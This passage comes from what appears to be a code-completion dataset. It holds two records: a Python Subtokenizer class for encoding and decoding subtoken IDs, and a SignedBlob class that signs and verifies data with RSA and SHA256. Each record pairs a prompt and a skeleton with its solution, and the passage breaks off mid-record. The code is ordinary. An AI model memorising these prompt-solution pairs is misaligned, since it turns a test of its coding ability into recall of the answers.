tf.io.gfile.exists(vocab_file):\n tf.compat.v1.logging.info('Vocab file already exists (%s)' % vocab_file)\nelse:\n tf.compat.v1.logging.info('Begin steps to create subtoken vocabulary...')\n token_counts = _count_tokens(files, file_byte_limit)\n alphabet = _generate_alphabet_dict(token_counts)\n subtoken_list = _generate_subtokens_with_target_vocab_size(token_counts, alphabet, target_vocab_size, threshold, min_count, reserved_tokens)\n tf.compat.v1.logging.info('Generated vocabulary with %d subtokens.' % len(subtoken_list))\n mlperf_log.transformer_print(key=mlperf_log.PREPROC_VOCAB_SIZE, value=len(subtoken_list))\n _save_vocab_file(vocab_file, subtoken_list)\nreturn Subtokenizer(vocab_file)", "ret = []\ntokens = _split_string_to_tokens(_native_to_unicode(raw_string))\nfor token in tokens:\n ret.extend(self._token_to_subtoken_ids(token))\nif add_eos:\n ret.append(EOS_ID)\nreturn ret", "cache_location = hash(token) % self._cache_size\ncache_key, cache_value = self._cache[cache_location]\nif cache_key == token:\n return cache_value\nret = _split_token_to_subtokens(_escape_token(token, self.alphabet), self.subtoken_to_id_dict, self.max_subtoken_length)\nret = [self.subtoken_to_id_dict[subtoken_id] for subtoken_id in ret]\nself._cache[cache_location] = (token, ret)\nreturn ret", "if isinstance(subtokens, np.ndarray):\n subtokens = subtokens.tolist()\nif not subtokens:\n return ''\nassert isinstance(subtokens, list) and isinstance(subtokens[0], int), 'Subtokens argument passed into decode() must be a list of integers.'\nreturn _unicode_to_native(_join_tokens_to_string(self._subtoken_ids_to_tokens(subtokens)))", "escaped_tokens = ''.join([self.subtoken_list[s] for s in subtokens if s < len(self.subtoken_list)])\nescaped_tokens = escaped_tokens.split('_')\nret = []\nfor token in escaped_tokens:\n if token:\n ret.append(_unescape_token(token))\nreturn ret"], "bodies_text": "<|body_start_0|>\n tf.compat.v1.logging.info('Initializing Subtokenizer from file %s.' % vocab_file)\n if reserved_tokens is None:\n reserved_tokens = RESERVED_TOKENS\n self.subtoken_list = _load_vocab_file(vocab_file, reserved_tokens)\n self.alphabet = _generate_alphabet_dict(self.subtoken_list)\n self.subtoken_to_id_dict = _list_to_index_dict(self.subtoken_list)\n self.max_subtoken_length = 0\n for subtoken in self.subtoken_list:\n self.max_subtoken_length = max(self.max_subtoken_length, len(subtoken))\n self._cache_size = 2 ** 20\n self._cache = [(None, None)] * self._cache_size\n<|end_body_0|>\n\n<|body_start_1|>\n if reserved_tokens is None:\n reserved_tokens = RESERVED_TOKENS\n if tf.io.gfile.exists(vocab_file):\n tf.compat.v1.logging.info('Vocab file already exists (%s)' % vocab_file)\n else:\n tf.compat.v1.logging.info('Begin steps to create subtoken vocabulary...')\n token_counts = _count_tokens(files, file_byte_limit)\n alphabet = _generate_alphabet_dict(token_counts)\n subtoken_list = _generate_subtokens_with_target_vocab_size(token_counts, alphabet, target_vocab_size, threshold, min_count, reserved_tokens)\n tf.compat.v1.logging.info('Generated vocabulary with %d subtokens.' % len(subtoken_list))\n mlperf_log.transformer_print(key=mlperf_log.PREPROC_VOCAB_SIZE, value=len(subtoken_list))\n _save_vocab_file(vocab_file, subtoken_list)\n return Subtokenizer(vocab_file)\n<|end_body_1|>\n\n<|body_start_2|>\n ret = []\n tokens = _split_string_to_tokens(_native_to_unicode(raw_string))\n for token in tokens:\n ret.extend(self._token_to_subtoken_ids(token))\n if add_eos:\n ret.append(EOS_ID)\n return ret\n<|end_body_2|>\n\n<|body_start_3|>\n cache_location = hash(token) % self._cache_size\n cache_key, cache_value = self._cache[cache_location]\n if cache_key == token:\n return cache_value\n ret = _split_token_to_subtokens(_escape_token(token, self.alphabet), self.subtoken_to_id_dict, self.max_subtoken_length)\n ret = [self.subtoken_to_id_dict[subtoken_id] for subtoken_id in ret]\n self._cache[cache_location] = (token, ret)\n return ret\n<|end_body_3|>\n\n<|body_start_4|>\n if isinstance(subtokens, np.ndarray):\n subtokens = subtokens.tolist()\n if not subtokens:\n return ''\n assert isinstance(subtokens, list) and isinstance(subtokens[0], int), 'Subtokens argument passed into decode() must be a list of integers.'\n return _unicode_to_native(_join_tokens_to_string(self._subtoken_ids_to_tokens(subtokens)))\n<|end_body_4|>\n\n<|body_start_5|>\n escaped_tokens = ''.join([self.subtoken_list[s] for s in subtokens if s < len(self.subtoken_list)])\n escaped_tokens = escaped_tokens.split('_')\n ret = []\n for token in escaped_tokens:\n if token:\n ret.append(_unescape_token(token))\n return ret\n<|end_body_5|>\n", "class_docstring": "Encodes and decodes strings to/from integer IDs.", "class_name": "Subtokenizer", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Subtokenizer:\n \"\"\"Encodes and decodes strings to/from integer IDs.\"\"\"\n\n def __init__(self, vocab_file, reserved_tokens=None):\n \"\"\"Initializes class, creating a vocab file if data_files is provided.\"\"\"\n <|body_0|>\n\n def init_from_files(vocab_file, files, target_vocab_size, threshold, min_count=None, file_byte_limit=1000000.0, reserved_tokens=None):\n \"\"\"Create subtoken vocabulary based on files, and save vocab to file. Args: vocab_file: String name of vocab file to store subtoken vocabulary. files: List of file paths that will be used to generate vocabulary. target_vocab_size: target vocabulary size to generate. threshold: int threshold of vocabulary size to accept. min_count: int minimum count to use for generating the vocabulary. The min count is the minimum number of times a subtoken should appear in the files before it is added to the vocabulary. If set to none, this value is found using binary search. file_byte_limit: (Default 1e6) Maximum number of bytes of sample text that will be drawn from the files. reserved_tokens: List of string\"\"\"\n <|body_1|>\n\n def encode(self, raw_string, add_eos=False):\n \"\"\"Encodes a string into a list of int subtoken ids.\"\"\"\n <|body_2|>\n\n def _token_to_subtoken_ids(self, token):\n \"\"\"Encode a single token into a list of subtoken ids.\"\"\"\n <|body_3|>\n\n def decode(self, subtokens):\n \"\"\"Converts list of int subtokens ids into a string.\"\"\"\n <|body_4|>\n\n def _subtoken_ids_to_tokens(self, subtokens):\n \"\"\"Convert list of int subtoken ids to a list of string tokens.\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n tf.compat.v1.logging.info('Initializing Subtokenizer from file %s.' % vocab_file)\n if reserved_tokens is None:\n reserved_tokens = RESERVED_TOKENS\n self.subtoken_list = _load_vocab_file(vocab_file, reserved_tokens)\n self.alphabet = _generate_alphabet_dict(self.subtoken_list)\n self.subtoken_to_id_dict = _list_to_index_dict(self.subtoken_list)\n self.max_subtoken_length = 0\n for subtoken in self.subtoken_list:\n self.max_subtoken_length = max(self.max_subtoken_length, len(subtoken))\n self._cache_size = 2 ** 20\n self._cache = [(None, None)] * self._cache_size\n<|end_body_0|>\n\n<|body_start_1|>\n if reserved_tokens is None:\n reserved_tokens = RESERVED_TOKENS\n if tf.io.gfile.exists(vocab_file):\n tf.compat.v1.logging.info('Vocab file already exists (%s)' % vocab_file)\n else:\n tf.compat.v1.logging.info('Begin steps to create subtoken vocabulary...')\n token_counts = _count_tokens(files, file_byte_limit)\n alphabet = _generate_alphabet_dict(token_counts)\n subtoken_list = _generate_subtokens_with_target_vocab_size(token_counts, alphabet, target_vocab_size, threshold, min_count, reserved_tokens)\n tf.compat.v1.logging.info('Generated vocabulary with %d subtokens.' % len(subtoken_list))\n mlperf_log.transformer_print(key=mlperf_log.PREPROC_VOCAB_SIZE, value=len(subtoken_list))\n _save_vocab_file(vocab_file, subtoken_list)\n return Subtokenizer(vocab_file)\n<|end_body_1|>\n\n<|body_start_2|>\n ret = []\n tokens = _split_string_to_tokens(_native_to_unicode(raw_string))\n for token in tokens:\n ret.extend(self._token_to_subtoken_ids(token))\n if add_eos:\n ret.append(EOS_ID)\n return ret\n<|end_body_2|>\n\n<|body_start_3|>\n cache_location = hash(token) % self._cache_size\n cache_key, cache_value = self._cache[cache_location]\n if cache_key == token:\n return cache_value\n ret = _split_token_to_subtokens(_escape_token(token, self.alphabet), self.subtoken_to_id_dict, self.max_subtoken_length)\n ret = [self.subtoken_to_id_dict[subtoken_id] for subtoken_id in ret]\n self._cache[cache_location] = (token, ret)\n return ret\n<|end_body_3|>\n\n<|body_start_4|>\n if isinstance(subtokens, np.ndarray):\n subtokens = subtokens.tolist()\n if not subtokens:\n return ''\n assert isinstance(subtokens, list) and isinstance(subtokens[0], int), 'Subtokens argument passed into decode() must be a list of integers.'\n return _unicode_to_native(_join_tokens_to_string(self._subtoken_ids_to_tokens(subtokens)))\n<|end_body_4|>\n\n<|body_start_5|>\n escaped_tokens = ''.join([self.subtoken_list[s] for s in subtokens if s < len(self.subtoken_list)])\n escaped_tokens = escaped_tokens.split('_')\n ret = []\n for token in escaped_tokens:\n if token:\n ret.append(_unescape_token(token))\n return ret\n<|end_body_5|>\n", "id": "stack_v2_sparse_classes_10k_test_000433", "length_bytes": 22774, "license_type": "permissive", "methods": [{"docstring": "Initializes class, creating a vocab file if data_files is provided.", "name": "__init__", "signature": "def __init__(self, vocab_file, reserved_tokens=None)"}, {"docstring": "Create subtoken vocabulary based on files, and save vocab to file. Args: vocab_file: String name of vocab file to store subtoken vocabulary. files: List of file paths that will be used to generate vocabulary. target_vocab_size: target vocabulary size to generate. threshold: int threshold of vocabulary size to accept. min_count: int minimum count to use for generating the vocabulary. The min count is the minimum number of times a subtoken should appear in the files before it is added to the vocabulary. If set to none, this value is found using binary search. file_byte_limit: (Default 1e6) Maximum number of bytes of sample text that will be drawn from the files. reserved_tokens: List of string", "name": "init_from_files", "signature": "def init_from_files(vocab_file, files, target_vocab_size, threshold, min_count=None, file_byte_limit=1000000.0, reserved_tokens=None)"}, {"docstring": "Encodes a string into a list of int subtoken ids.", "name": "encode", "signature": "def encode(self, raw_string, add_eos=False)"}, {"docstring": "Encode a single token into a list of subtoken ids.", "name": "_token_to_subtoken_ids", "signature": "def _token_to_subtoken_ids(self, token)"}, {"docstring": "Converts list of int subtokens ids into a string.", "name": "decode", "signature": "def decode(self, subtokens)"}, {"docstring": "Convert list of int subtoken ids to a list of string tokens.", "name": "_subtoken_ids_to_tokens", "signature": "def _subtoken_ids_to_tokens(self, subtokens)"}], "n_methods": 6, "prompt": "Implement the Python class `Subtokenizer` described below.\n\nClass description:\nEncodes and decodes strings to/from integer IDs.\n\nMethod signatures and docstrings:\n- def __init__(self, vocab_file, reserved_tokens=None): Initializes class, creating a vocab file if data_files is provided.\n- def init_from_files(vocab_file, files, target_vocab_size, threshold, min_count=None, file_byte_limit=1000000.0, reserved_tokens=None): Create subtoken vocabulary based on files, and save vocab to file. Args: vocab_file: String name of vocab file to store subtoken vocabulary. files: List of file paths that will be used to generate vocabulary. target_vocab_size: target vocabulary size to generate. threshold: int threshold of vocabulary size to accept. min_count: int minimum count to use for generating the vocabulary. The min count is the minimum number of times a subtoken should appear in the files before it is added to the vocabulary. If set to none, this value is found using binary search. file_byte_limit: (Default 1e6) Maximum number of bytes of sample text that will be drawn from the files. reserved_tokens: List of string\n- def encode(self, raw_string, add_eos=False): Encodes a string into a list of int subtoken ids.\n- def _token_to_subtoken_ids(self, token): Encode a single token into a list of subtoken ids.\n- def decode(self, subtokens): Converts list of int subtokens ids into a string.\n- def _subtoken_ids_to_tokens(self, subtokens): Convert list of int subtoken ids to a list of string tokens.", "prompted_full_text": "Implement the Python class `Subtokenizer` described below.\n\nClass description:\nEncodes and decodes strings to/from integer IDs.\n\nMethod signatures and docstrings:\n- def __init__(self, vocab_file, reserved_tokens=None): Initializes class, creating a vocab file if data_files is provided.\n- def init_from_files(vocab_file, files, target_vocab_size, threshold, min_count=None, file_byte_limit=1000000.0, reserved_tokens=None): Create subtoken vocabulary based on files, and save vocab to file. Args: vocab_file: String name of vocab file to store subtoken vocabulary. files: List of file paths that will be used to generate vocabulary. target_vocab_size: target vocabulary size to generate. threshold: int threshold of vocabulary size to accept. min_count: int minimum count to use for generating the vocabulary. The min count is the minimum number of times a subtoken should appear in the files before it is added to the vocabulary. If set to none, this value is found using binary search. file_byte_limit: (Default 1e6) Maximum number of bytes of sample text that will be drawn from the files. reserved_tokens: List of string\n- def encode(self, raw_string, add_eos=False): Encodes a string into a list of int subtoken ids.\n- def _token_to_subtoken_ids(self, token): Encode a single token into a list of subtoken ids.\n- def decode(self, subtokens): Converts list of int subtokens ids into a string.\n- def _subtoken_ids_to_tokens(self, subtokens): Convert list of int subtoken ids to a list of string tokens.\n\n<|skeleton|>\nclass Subtokenizer:\n \"\"\"Encodes and decodes strings to/from integer IDs.\"\"\"\n\n def __init__(self, vocab_file, reserved_tokens=None):\n \"\"\"Initializes class, creating a vocab file if data_files is provided.\"\"\"\n <|body_0|>\n\n def init_from_files(vocab_file, files, target_vocab_size, threshold, min_count=None, file_byte_limit=1000000.0, reserved_tokens=None):\n \"\"\"Create subtoken vocabulary based on files, and save vocab to file. Args: vocab_file: String name of vocab file to store subtoken vocabulary. files: List of file paths that will be used to generate vocabulary. target_vocab_size: target vocabulary size to generate. threshold: int threshold of vocabulary size to accept. min_count: int minimum count to use for generating the vocabulary. The min count is the minimum number of times a subtoken should appear in the files before it is added to the vocabulary. If set to none, this value is found using binary search. file_byte_limit: (Default 1e6) Maximum number of bytes of sample text that will be drawn from the files. reserved_tokens: List of string\"\"\"\n <|body_1|>\n\n def encode(self, raw_string, add_eos=False):\n \"\"\"Encodes a string into a list of int subtoken ids.\"\"\"\n <|body_2|>\n\n def _token_to_subtoken_ids(self, token):\n \"\"\"Encode a single token into a list of subtoken ids.\"\"\"\n <|body_3|>\n\n def decode(self, subtokens):\n \"\"\"Converts list of int subtokens ids into a string.\"\"\"\n <|body_4|>\n\n def _subtoken_ids_to_tokens(self, subtokens):\n \"\"\"Convert list of int subtoken ids to a list of string tokens.\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n tf.compat.v1.logging.info('Initializing Subtokenizer from file %s.' % vocab_file)\n if reserved_tokens is None:\n reserved_tokens = RESERVED_TOKENS\n self.subtoken_list = _load_vocab_file(vocab_file, reserved_tokens)\n self.alphabet = _generate_alphabet_dict(self.subtoken_list)\n self.subtoken_to_id_dict = _list_to_index_dict(self.subtoken_list)\n self.max_subtoken_length = 0\n for subtoken in self.subtoken_list:\n self.max_subtoken_length = max(self.max_subtoken_length, len(subtoken))\n self._cache_size = 2 ** 20\n self._cache = [(None, None)] * self._cache_size\n<|end_body_0|>\n\n<|body_start_1|>\n if reserved_tokens is None:\n reserved_tokens = RESERVED_TOKENS\n if tf.io.gfile.exists(vocab_file):\n tf.compat.v1.logging.info('Vocab file already exists (%s)' % vocab_file)\n else:\n tf.compat.v1.logging.info('Begin steps to create subtoken vocabulary...')\n token_counts = _count_tokens(files, file_byte_limit)\n alphabet = _generate_alphabet_dict(token_counts)\n subtoken_list = _generate_subtokens_with_target_vocab_size(token_counts, alphabet, target_vocab_size, threshold, min_count, reserved_tokens)\n tf.compat.v1.logging.info('Generated vocabulary with %d subtokens.' % len(subtoken_list))\n mlperf_log.transformer_print(key=mlperf_log.PREPROC_VOCAB_SIZE, value=len(subtoken_list))\n _save_vocab_file(vocab_file, subtoken_list)\n return Subtokenizer(vocab_file)\n<|end_body_1|>\n\n<|body_start_2|>\n ret = []\n tokens = _split_string_to_tokens(_native_to_unicode(raw_string))\n for token in tokens:\n ret.extend(self._token_to_subtoken_ids(token))\n if add_eos:\n ret.append(EOS_ID)\n return ret\n<|end_body_2|>\n\n<|body_start_3|>\n cache_location = hash(token) % self._cache_size\n cache_key, cache_value = self._cache[cache_location]\n if cache_key == token:\n return cache_value\n ret = _split_token_to_subtokens(_escape_token(token, self.alphabet), self.subtoken_to_id_dict, self.max_subtoken_length)\n ret = [self.subtoken_to_id_dict[subtoken_id] for subtoken_id in ret]\n self._cache[cache_location] = (token, ret)\n return ret\n<|end_body_3|>\n\n<|body_start_4|>\n if isinstance(subtokens, np.ndarray):\n subtokens = subtokens.tolist()\n if not subtokens:\n return ''\n assert isinstance(subtokens, list) and isinstance(subtokens[0], int), 'Subtokens argument passed into decode() must be a list of integers.'\n return _unicode_to_native(_join_tokens_to_string(self._subtoken_ids_to_tokens(subtokens)))\n<|end_body_4|>\n\n<|body_start_5|>\n escaped_tokens = ''.join([self.subtoken_list[s] for s in subtokens if s < len(self.subtoken_list)])\n escaped_tokens = escaped_tokens.split('_')\n ret = []\n for token in escaped_tokens:\n if token:\n ret.append(_unescape_token(token))\n return ret\n<|end_body_5|>\n", "revision_id": "9304c9f59fde013f158ac338fc80171c0e8cda5d", "skeleton": "<|skeleton|>\nclass Subtokenizer:\n \"\"\"Encodes and decodes strings to/from integer IDs.\"\"\"\n\n def __init__(self, vocab_file, reserved_tokens=None):\n \"\"\"Initializes class, creating a vocab file if data_files is provided.\"\"\"\n <|body_0|>\n\n def init_from_files(vocab_file, files, target_vocab_size, threshold, min_count=None, file_byte_limit=1000000.0, reserved_tokens=None):\n \"\"\"Create subtoken vocabulary based on files, and save vocab to file. Args: vocab_file: String name of vocab file to store subtoken vocabulary. files: List of file paths that will be used to generate vocabulary. target_vocab_size: target vocabulary size to generate. threshold: int threshold of vocabulary size to accept. min_count: int minimum count to use for generating the vocabulary. The min count is the minimum number of times a subtoken should appear in the files before it is added to the vocabulary. If set to none, this value is found using binary search. file_byte_limit: (Default 1e6) Maximum number of bytes of sample text that will be drawn from the files. reserved_tokens: List of string\"\"\"\n <|body_1|>\n\n def encode(self, raw_string, add_eos=False):\n \"\"\"Encodes a string into a list of int subtoken ids.\"\"\"\n <|body_2|>\n\n def _token_to_subtoken_ids(self, token):\n \"\"\"Encode a single token into a list of subtoken ids.\"\"\"\n <|body_3|>\n\n def decode(self, subtokens):\n \"\"\"Converts list of int subtokens ids into a string.\"\"\"\n <|body_4|>\n\n def _subtoken_ids_to_tokens(self, subtokens):\n \"\"\"Convert list of int subtoken ids to a list of string tokens.\"\"\"\n <|body_5|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Subtokenizer:\n \"\"\"Encodes and decodes strings to/from integer IDs.\"\"\"\n\n def __init__(self, vocab_file, reserved_tokens=None):\n \"\"\"Initializes class, creating a vocab file if data_files is provided.\"\"\"\n tf.compat.v1.logging.info('Initializing Subtokenizer from file %s.' % vocab_file)\n if reserved_tokens is None:\n reserved_tokens = RESERVED_TOKENS\n self.subtoken_list = _load_vocab_file(vocab_file, reserved_tokens)\n self.alphabet = _generate_alphabet_dict(self.subtoken_list)\n self.subtoken_to_id_dict = _list_to_index_dict(self.subtoken_list)\n self.max_subtoken_length = 0\n for subtoken in self.subtoken_list:\n self.max_subtoken_length = max(self.max_subtoken_length, len(subtoken))\n self._cache_size = 2 ** 20\n self._cache = [(None, None)] * self._cache_size\n\n def init_from_files(vocab_file, files, target_vocab_size, threshold, min_count=None, file_byte_limit=1000000.0, reserved_tokens=None):\n \"\"\"Create subtoken vocabulary based on files, and save vocab to file. Args: vocab_file: String name of vocab file to store subtoken vocabulary. files: List of file paths that will be used to generate vocabulary. target_vocab_size: target vocabulary size to generate. threshold: int threshold of vocabulary size to accept. min_count: int minimum count to use for generating the vocabulary. The min count is the minimum number of times a subtoken should appear in the files before it is added to the vocabulary. If set to none, this value is found using binary search. file_byte_limit: (Default 1e6) Maximum number of bytes of sample text that will be drawn from the files. reserved_tokens: List of string\"\"\"\n if reserved_tokens is None:\n reserved_tokens = RESERVED_TOKENS\n if tf.io.gfile.exists(vocab_file):\n tf.compat.v1.logging.info('Vocab file already exists (%s)' % vocab_file)\n else:\n tf.compat.v1.logging.info('Begin steps to create subtoken vocabulary...')\n token_counts = _count_tokens(files, file_byte_limit)\n alphabet = _generate_alphabet_dict(token_counts)\n subtoken_list = _generate_subtokens_with_target_vocab_size(token_counts, alphabet, target_vocab_size, threshold, min_count, reserved_tokens)\n tf.compat.v1.logging.info('Generated vocabulary with %d subtokens.' % len(subtoken_list))\n mlperf_log.transformer_print(key=mlperf_log.PREPROC_VOCAB_SIZE, value=len(subtoken_list))\n _save_vocab_file(vocab_file, subtoken_list)\n return Subtokenizer(vocab_file)\n\n def encode(self, raw_string, add_eos=False):\n \"\"\"Encodes a string into a list of int subtoken ids.\"\"\"\n ret = []\n tokens = _split_string_to_tokens(_native_to_unicode(raw_string))\n for token in tokens:\n ret.extend(self._token_to_subtoken_ids(token))\n if add_eos:\n ret.append(EOS_ID)\n return ret\n\n def _token_to_subtoken_ids(self, token):\n \"\"\"Encode a single token into a list of subtoken ids.\"\"\"\n cache_location = hash(token) % self._cache_size\n cache_key, cache_value = self._cache[cache_location]\n if cache_key == token:\n return cache_value\n ret = _split_token_to_subtokens(_escape_token(token, self.alphabet), self.subtoken_to_id_dict, self.max_subtoken_length)\n ret = [self.subtoken_to_id_dict[subtoken_id] for subtoken_id in ret]\n self._cache[cache_location] = (token, ret)\n return ret\n\n def decode(self, subtokens):\n \"\"\"Converts list of int subtokens ids into a string.\"\"\"\n if isinstance(subtokens, np.ndarray):\n subtokens = subtokens.tolist()\n if not subtokens:\n return ''\n assert isinstance(subtokens, list) and isinstance(subtokens[0], int), 'Subtokens argument passed into decode() must be a list of integers.'\n return _unicode_to_native(_join_tokens_to_string(self._subtoken_ids_to_tokens(subtokens)))\n\n def _subtoken_ids_to_tokens(self, subtokens):\n \"\"\"Convert list of int subtoken ids to a list of string tokens.\"\"\"\n escaped_tokens = ''.join([self.subtoken_list[s] for s in subtokens if s < len(self.subtoken_list)])\n escaped_tokens = escaped_tokens.split('_')\n ret = []\n for token in escaped_tokens:\n if token:\n ret.append(_unescape_token(token))\n return ret\n", "source": "the_stack_v2_python_sparse", "source_path": "models/language_translation/tensorflow/transformer_mlperf/inference/int8/transformer/utils/tokenizer.py", "source_repo": "IntelAI/models", "split": "test", "star_events_count": 609} {"blob_id": "1c5724bfeb53cfef03c0cda0597e418e2fd95925", "bodies": ["if self.digest_type != self.HashType.SHA256:\n raise rdfvalue.DecodeError('Unsupported digest.')\nif self.signature_type not in [self.SignatureType.RSA_PKCS1v15, self.SignatureType.RSA_PSS]:\n raise rdfvalue.DecodeError('Unsupported signature type.')\ntry:\n public_key.Verify(self.data, self.signature)\nexcept InvalidSignature as e:\n raise rdfvalue.DecodeError('Could not verify blob. Error: %s' % e)\nreturn True", "if signing_key.KeyLen() < 2048:\n logging.warning('signing key is too short.')\nself.signature = signing_key.Sign(data)\nself.signature_type = self.SignatureType.RSA_PKCS1v15\nself.digest = hashlib.sha256(data).digest()\nself.digest_type = self.HashType.SHA256\nself.data = data\nif verify_key is None:\n verify_key = signing_key.GetPublicKey()\nself.Verify(verify_key)\nreturn self"], "bodies_text": "<|body_start_0|>\n if self.digest_type != self.HashType.SHA256:\n raise rdfvalue.DecodeError('Unsupported digest.')\n if self.signature_type not in [self.SignatureType.RSA_PKCS1v15, self.SignatureType.RSA_PSS]:\n raise rdfvalue.DecodeError('Unsupported signature type.')\n try:\n public_key.Verify(self.data, self.signature)\n except InvalidSignature as e:\n raise rdfvalue.DecodeError('Could not verify blob. Error: %s' % e)\n return True\n<|end_body_0|>\n\n<|body_start_1|>\n if signing_key.KeyLen() < 2048:\n logging.warning('signing key is too short.')\n self.signature = signing_key.Sign(data)\n self.signature_type = self.SignatureType.RSA_PKCS1v15\n self.digest = hashlib.sha256(data).digest()\n self.digest_type = self.HashType.SHA256\n self.data = data\n if verify_key is None:\n verify_key = signing_key.GetPublicKey()\n self.Verify(verify_key)\n return self\n<|end_body_1|>\n", "class_docstring": "A signed blob. The client can receive and verify a signed blob (e.g. driver or executable binary). Once verified, the client may execute this.", "class_name": "SignedBlob", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SignedBlob:\n \"\"\"A signed blob. The client can receive and verify a signed blob (e.g. driver or executable binary). Once verified, the client may execute this.\"\"\"\n\n def Verify(self, public_key):\n \"\"\"Verify the data in this blob. Args: public_key: The public key to use for verification. Returns: True when verification succeeds. Raises: rdfvalue.DecodeError if the data is not suitable verified.\"\"\"\n <|body_0|>\n\n def Sign(self, data, signing_key, verify_key=None):\n \"\"\"Use the data to sign this blob. Args: data: String containing the blob data. signing_key: The key to sign with. verify_key: Key to verify with. If None we assume the signing key also contains the public key. Returns: self for call chaining.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if self.digest_type != self.HashType.SHA256:\n raise rdfvalue.DecodeError('Unsupported digest.')\n if self.signature_type not in [self.SignatureType.RSA_PKCS1v15, self.SignatureType.RSA_PSS]:\n raise rdfvalue.DecodeError('Unsupported signature type.')\n try:\n public_key.Verify(self.data, self.signature)\n except InvalidSignature as e:\n raise rdfvalue.DecodeError('Could not verify blob. Error: %s' % e)\n return True\n<|end_body_0|>\n\n<|body_start_1|>\n if signing_key.KeyLen() < 2048:\n logging.warning('signing key is too short.')\n self.signature = signing_key.Sign(data)\n self.signature_type = self.SignatureType.RSA_PKCS1v15\n self.digest = hashlib.sha256(data).digest()\n self.digest_type = self.HashType.SHA256\n self.data = data\n if verify_key is None:\n verify_key = signing_key.GetPublicKey()\n self.Verify(verify_key)\n return self\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000434", "length_bytes": 27541, "license_type": "permissive", "methods": [{"docstring": "Verify the data in this blob. Args: public_key: The public key to use for verification. Returns: True when verification succeeds. Raises: rdfvalue.DecodeError if the data is not suitable verified.", "name": "Verify", "signature": "def Verify(self, public_key)"}, {"docstring": "Use the data to sign this blob. Args: data: String containing the blob data. signing_key: The key to sign with. verify_key: Key to verify with. If None we assume the signing key also contains the public key. Returns: self for call chaining.", "name": "Sign", "signature": "def Sign(self, data, signing_key, verify_key=None)"}], "n_methods": 2, "prompt": "Implement the Python class `SignedBlob` described below.\n\nClass description:\nA signed blob. The client can receive and verify a signed blob (e.g. driver or executable binary). Once verified, the client may execute this.\n\nMethod signatures and docstrings:\n- def Verify(self, public_key): Verify the data in this blob. Args: public_key: The public key to use for verification. Returns: True when verification succeeds. Raises: rdfvalue.DecodeError if the data is not suitable verified.\n- def Sign(self, data, signing_key, verify_key=None): Use the data to sign this blob. Args: data: String containing the blob data. signing_key: The key to sign with. verify_key: Key to verify with. If None we assume the signing key also contains the public key. Returns: self for call chaining.", "prompted_full_text": "Implement the Python class `SignedBlob` described below.\n\nClass description:\nA signed blob. The client can receive and verify a signed blob (e.g. driver or executable binary). Once verified, the client may execute this.\n\nMethod signatures and docstrings:\n- def Verify(self, public_key): Verify the data in this blob. Args: public_key: The public key to use for verification. Returns: True when verification succeeds. Raises: rdfvalue.DecodeError if the data is not suitable verified.\n- def Sign(self, data, signing_key, verify_key=None): Use the data to sign this blob. Args: data: String containing the blob data. signing_key: The key to sign with. verify_key: Key to verify with. If None we assume the signing key also contains the public key. Returns: self for call chaining.\n\n<|skeleton|>\nclass SignedBlob:\n \"\"\"A signed blob. The client can receive and verify a signed blob (e.g. driver or executable binary). Once verified, the client may execute this.\"\"\"\n\n def Verify(self, public_key):\n \"\"\"Verify the data in this blob. Args: public_key: The public key to use for verification. Returns: True when verification succeeds. Raises: rdfvalue.DecodeError if the data is not suitable verified.\"\"\"\n <|body_0|>\n\n def Sign(self, data, signing_key, verify_key=None):\n \"\"\"Use the data to sign this blob. Args: data: String containing the blob data. signing_key: The key to sign with. verify_key: Key to verify with. If None we assume the signing key also contains the public key. Returns: self for call chaining.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if self.digest_type != self.HashType.SHA256:\n raise rdfvalue.DecodeError('Unsupported digest.')\n if self.signature_type not in [self.SignatureType.RSA_PKCS1v15, self.SignatureType.RSA_PSS]:\n raise rdfvalue.DecodeError('Unsupported signature type.')\n try:\n public_key.Verify(self.data, self.signature)\n except InvalidSignature as e:\n raise rdfvalue.DecodeError('Could not verify blob. Error: %s' % e)\n return True\n<|end_body_0|>\n\n<|body_start_1|>\n if signing_key.KeyLen() < 2048:\n logging.warning('signing key is too short.')\n self.signature = signing_key.Sign(data)\n self.signature_type = self.SignatureType.RSA_PKCS1v15\n self.digest = hashlib.sha256(data).digest()\n self.digest_type = self.HashType.SHA256\n self.data = data\n if verify_key is None:\n verify_key = signing_key.GetPublicKey()\n self.Verify(verify_key)\n return self\n<|end_body_1|>\n", "revision_id": "44c0eb8c938302098ef7efae8cfd6b90bcfbb2d6", "skeleton": "<|skeleton|>\nclass SignedBlob:\n \"\"\"A signed blob. The client can receive and verify a signed blob (e.g. driver or executable binary). Once verified, the client may execute this.\"\"\"\n\n def Verify(self, public_key):\n \"\"\"Verify the data in this blob. Args: public_key: The public key to use for verification. Returns: True when verification succeeds. Raises: rdfvalue.DecodeError if the data is not suitable verified.\"\"\"\n <|body_0|>\n\n def Sign(self, data, signing_key, verify_key=None):\n \"\"\"Use the data to sign this blob. Args: data: String containing the blob data. signing_key: The key to sign with. verify_key: Key to verify with. If None we assume the signing key also contains the public key. Returns: self for call chaining.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SignedBlob:\n \"\"\"A signed blob. The client can receive and verify a signed blob (e.g. driver or executable binary). Once verified, the client may execute this.\"\"\"\n\n def Verify(self, public_key):\n \"\"\"Verify the data in this blob. Args: public_key: The public key to use for verification. Returns: True when verification succeeds. Raises: rdfvalue.DecodeError if the data is not suitable verified.\"\"\"\n if self.digest_type != self.HashType.SHA256:\n raise rdfvalue.DecodeError('Unsupported digest.')\n if self.signature_type not in [self.SignatureType.RSA_PKCS1v15, self.SignatureType.RSA_PSS]:\n raise rdfvalue.DecodeError('Unsupported signature type.')\n try:\n public_key.Verify(self.data, self.signature)\n except InvalidSignature as e:\n raise rdfvalue.DecodeError('Could not verify blob. Error: %s' % e)\n return True\n\n def 